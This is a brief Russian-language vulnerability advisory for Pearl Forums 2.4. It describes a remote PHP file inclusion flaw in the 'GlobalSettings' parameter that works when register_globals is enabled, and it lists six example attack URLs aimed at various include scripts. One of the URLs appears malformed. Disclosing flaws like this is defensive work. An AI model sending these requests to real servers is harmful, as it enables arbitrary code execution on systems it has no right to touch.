Программа: Pearl Forums 2.4
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре "GlobalSettings" различными сценариями. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Успешное эксплуатирование уязвимости требует включение опции "register_globals" в конфигурационном файле PHP.
Примеры:
http://[target]/[path]/includes/admin.php?templatesDirectory-evill
http://[target]/[path]/includes/password.php?GlobalSettings[templatesDirectory]=evill
http://[target]/[path]/includes/profile.php?GlobalSettings[templatesDirectory]=evill
http://[target]/[path]/includes/merge.php?GlobalSettings[templatesDirectory]=evill
http://[target]/[path]/includes/adminPolls.php?GlobalSettings[templatesDirectory]=evill
http://[target]/[path]/includes/poll.php?GlobalSettings[templatesDirectory]=evill